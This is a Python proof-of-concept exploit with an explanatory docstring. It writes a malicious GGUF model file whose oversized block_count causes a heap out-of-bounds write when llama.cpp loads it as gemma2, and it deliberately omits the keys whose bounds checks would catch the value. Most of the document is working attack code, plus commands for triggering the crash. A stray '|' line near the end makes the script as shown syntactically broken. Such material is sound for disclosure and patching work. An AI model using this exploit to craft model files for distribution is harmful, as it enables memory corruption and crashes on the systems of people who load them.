"""
PoC: Heap OOB write in llama.cpp via the unvalidated n_layer (block_count) parameter.

Vulnerability:
In src/llama-model.cpp line 520, hparams.n_layer is read from the GGUF file:
    ml.get_key(LLM_KV_BLOCK_COUNT, hparams.n_layer);

There is NO upper-bound check against LLAMA_MAX_LAYERS (512).

However, the hparams arrays indexed by layer number are all
std::array<..., LLAMA_MAX_LAYERS> with LLAMA_MAX_LAYERS = 512:
    std::array<uint32_t, 512> swa_layers;
    std::array<bool, 512> recurrent_layer_arr;
    std::array<uint32_t, 512> n_head_arr;
    std::array<uint32_t, 512> n_head_kv_arr;
    std::array<uint32_t, 512> n_ff_arr;

Note: n_expert IS checked (line 537: GGML_ASSERT(hparams.n_expert <= LLAMA_MAX_EXPERTS)),
showing that the developers intended bounds checks here but missed n_layer.

Exploitation path (gemma2 architecture):
In the LLM_ARCH_GEMMA2 case (line 1323), set_swa_pattern(2) is called at
line 1327, BEFORE any other key reads.

set_swa_pattern() in llama-hparams.cpp does:
    for (uint32_t il = 0; il < n_layer; ++il) {
        swa_layers[il] = ...;
    }

With n_layer = 10000, this writes 9488 uint32_t values (9488 * 4 = 37952 bytes)
past the end of the 512-element swa_layers array on the heap, corrupting the
rest of hparams and memory past the end of the llama_model allocation.

The common-path get_key_or_arr() calls for n_ff_arr and n_head_arr at
lines 570-576 DO have an n > N_MAX check, but only AFTER checking whether the
key exists. Since these keys are optional (required=false), omitting them from
the GGUF file causes an early return before the bounds check, allowing
execution to reach the arch-specific switch case.

Attack:
- GGUF v3 file with architecture = "gemma2"
- block_count = 10000 (far above the 512 limit)
- Minimal required keys: context_length, embedding_length, block_count
- The OOB write corrupts heap memory past the llama_model allocation

Confirmed results:
- ASan build: heap-buffer-overflow detected at llama-hparams.cpp:15
  in llama_hparams::set_swa_pattern(), WRITE of size 4
- Regular build: SIGSEGV (exit code 139) due to heap corruption
- Only a 256-byte GGUF file is needed (zero tensors, minimal KV pairs)
"""
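
# GGUF v3 on-disk layout produced by this script (all integers little-endian):
#   magic "GGUF" | uint32 version | uint64 n_tensors | uint64 n_kv,
#   then n_kv metadata entries, each: string key | uint32 value_type | value.
# With zero tensors there is no tensor-info section; only alignment padding
# follows the last KV pair. (Summary of the writer code below.)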

import struct
import os

GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3

# GGUF metadata value-type tags (only the types this PoC emits)
GGUF_TYPE_UINT32 = 4
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_STRING = 8

# Any block_count above LLAMA_MAX_LAYERS (512) overruns the fixed-size hparams
# arrays; 10000 makes the overflow large and easy to observe.
MALICIOUS_N_LAYER = 10000


def write_string(f, s):
    """Write a GGUF string: uint64 length + chars (no null terminator)."""
    encoded = s.encode('utf-8')
    f.write(struct.pack('<Q', len(encoded)))
    f.write(encoded)
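
# Byte-level example of the encoding above (a quick sanity note, not part of
# the PoC): write_string(f, "gemma2") emits
#     b"\x06\x00\x00\x00\x00\x00\x00\x00" + b"gemma2"
# i.e. the 8-byte little-endian length 6 followed by the raw UTF-8 bytes.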


def write_kv_string(f, key, value):
    """Write a KV pair with string value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_STRING))
    write_string(f, value)


def write_kv_uint32(f, key, value):
    """Write a KV pair with uint32 value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_UINT32))
    f.write(struct.pack('<I', value))


def write_kv_float32(f, key, value):
    """Write a KV pair with float32 value."""
    write_string(f, key)
    f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
    f.write(struct.pack('<f', value))


def create_nlayer_oob_gguf(output_path):
    """Create a GGUF file that triggers a heap OOB write via n_layer > 512."""
    arch = "gemma2"

    # Minimal metadata: just enough for the loader to reach the gemma2
    # hparams path, with block_count far above LLAMA_MAX_LAYERS.
    kv_pairs = [
        ("string", "general.architecture", arch),
        ("uint32", f"{arch}.context_length", 8192),
        ("uint32", f"{arch}.embedding_length", 256),
        ("uint32", f"{arch}.block_count", MALICIOUS_N_LAYER),
        ("float32", f"{arch}.attention.layer_norm_rms_epsilon", 1e-6),
    ]
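
    # Deliberately omitted: {arch}.feed_forward_length and
    # {arch}.attention.head_count. As described in the module docstring,
    # get_key_or_arr() only applies its n > N_MAX bounds check when the key
    # is present, so leaving these optional keys out lets loading reach the
    # gemma2 switch case and its set_swa_pattern(2) call with the oversized
    # n_layer.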

    n_kv = len(kv_pairs)
    n_tensors = 0

    with open(output_path, 'wb') as f:
        # Header: magic, version, tensor count, KV count
        f.write(GGUF_MAGIC)
        f.write(struct.pack('<I', GGUF_VERSION))
        f.write(struct.pack('<Q', n_tensors))
        f.write(struct.pack('<Q', n_kv))

        # Metadata KV pairs
        for kv_type, key, value in kv_pairs:
            if kv_type == "string":
                write_kv_string(f, key, value)
            elif kv_type == "uint32":
                write_kv_uint32(f, key, value)
            elif kv_type == "float32":
                write_kv_float32(f, key, value)

        # Pad to the default 32-byte GGUF alignment. With zero tensors nothing
        # follows the padding; it just keeps the file well-formed.
        current_pos = f.tell()
        alignment = 32
        padding_needed = (alignment - (current_pos % alignment)) % alignment
        f.write(b'\x00' * padding_needed)

    file_size = os.path.getsize(output_path)
    print(f"[*] Created: {output_path}")
    print(f"[*] File size: {file_size} bytes")
    print(f"[*] Architecture: {arch}")
    print(f"[*] block_count (n_layer): {MALICIOUS_N_LAYER} (LLAMA_MAX_LAYERS = 512)")
    print("[*]")
    print("[*] Vulnerability: set_swa_pattern() (called at llama-model.cpp:1327) writes")
    print(f"[*]   swa_layers[il] for il = 0..{MALICIOUS_N_LAYER - 1},")
    print("[*]   but swa_layers is std::array<uint32_t, 512>")
    print(f"[*]   => {MALICIOUS_N_LAYER - 512} OOB writes = {(MALICIOUS_N_LAYER - 512) * 4} bytes past the end")
    print("[*]")
    print("[*] Test with:")
    print(f"[*]   ./build/bin/llama-cli -m {output_path} -p 'hello'")
    print("[*]")
    print("[*] Test with an ASan build:")
    print(f"[*]   ./build-asan/bin/llama-cli -m {output_path} -p 'hello'")
    print("[*]")
    print("[*] Expected: heap-buffer-overflow report (ASan) or crash")
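

# Optional sanity check (a minimal sketch, independent of llama.cpp): re-read
# the file we just wrote and dump its header and KV pairs. This reader only
# understands the three value types this PoC emits; it verifies the PoC file
# itself and is not a general GGUF parser.
def verify_gguf_header(path):
    """Parse back the GGUF header and print every KV pair."""
    with open(path, 'rb') as f:
        magic = f.read(4)
        version, = struct.unpack('<I', f.read(4))
        n_tensors, = struct.unpack('<Q', f.read(8))
        n_kv, = struct.unpack('<Q', f.read(8))
        print(f"[*] verify: magic={magic!r} version={version} "
              f"n_tensors={n_tensors} n_kv={n_kv}")
        for _ in range(n_kv):
            key_len, = struct.unpack('<Q', f.read(8))
            key = f.read(key_len).decode('utf-8')
            vtype, = struct.unpack('<I', f.read(4))
            if vtype == GGUF_TYPE_STRING:
                val_len, = struct.unpack('<Q', f.read(8))
                value = f.read(val_len).decode('utf-8')
            elif vtype == GGUF_TYPE_UINT32:
                value, = struct.unpack('<I', f.read(4))
            elif vtype == GGUF_TYPE_FLOAT32:
                value, = struct.unpack('<f', f.read(4))
            else:
                raise ValueError(f"unexpected GGUF value type {vtype}")
            print(f"[*] verify:   {key} = {value}")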
|

if __name__ == "__main__":
    output_path = "/Users/eltarne/Documents/script/gguf_poc/poc_nlayer_oob.gguf"
    os.makedirs(os.path.dirname(output_path), exist_ok=True)
    create_nlayer_oob_gguf(output_path)
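    verify_gguf_header(output_path)  # optional: confirm the header round-trips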